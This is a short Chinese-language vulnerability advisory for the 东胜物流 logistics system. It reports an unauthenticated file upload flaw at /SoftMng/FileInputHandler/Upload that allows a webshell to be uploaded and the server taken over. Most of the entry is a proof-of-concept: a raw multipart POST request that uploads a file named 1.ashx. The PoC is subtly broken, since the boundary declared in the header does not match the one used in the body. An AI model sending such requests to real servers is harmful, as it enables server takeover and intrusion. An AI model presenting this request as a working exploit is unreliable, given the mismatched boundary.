东胜物流 /SoftMng/FileInputHandler/Upload 文件上传漏洞

日期: 2025-07-08 | 影响软件: 东胜物流 | POC: 已公开

漏洞描述

东胜物流系统是一款用于物流管理的系统。该系统的 /SoftMng/FileInputHandler/Upload 接口存在未授权的文件上传漏洞。攻击者可以通过该接口上传恶意文件(如webshell),从而获取服务器权限,导致系统安全受到严重威胁。

PoC代码

POST /SoftMng/FileInputHandler/Upload HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTqkdY1lCvbvpmown

------WebKitFormBoundaryaKljzbg49Mq4ggLz
Content-Disposition: form-data; name="LoadFile"; filename="1.ashx"
Content-Type: application/octet-stream

12312
------WebKitFormBoundaryaKljzbg49Mq4ggLz--

相关漏洞推荐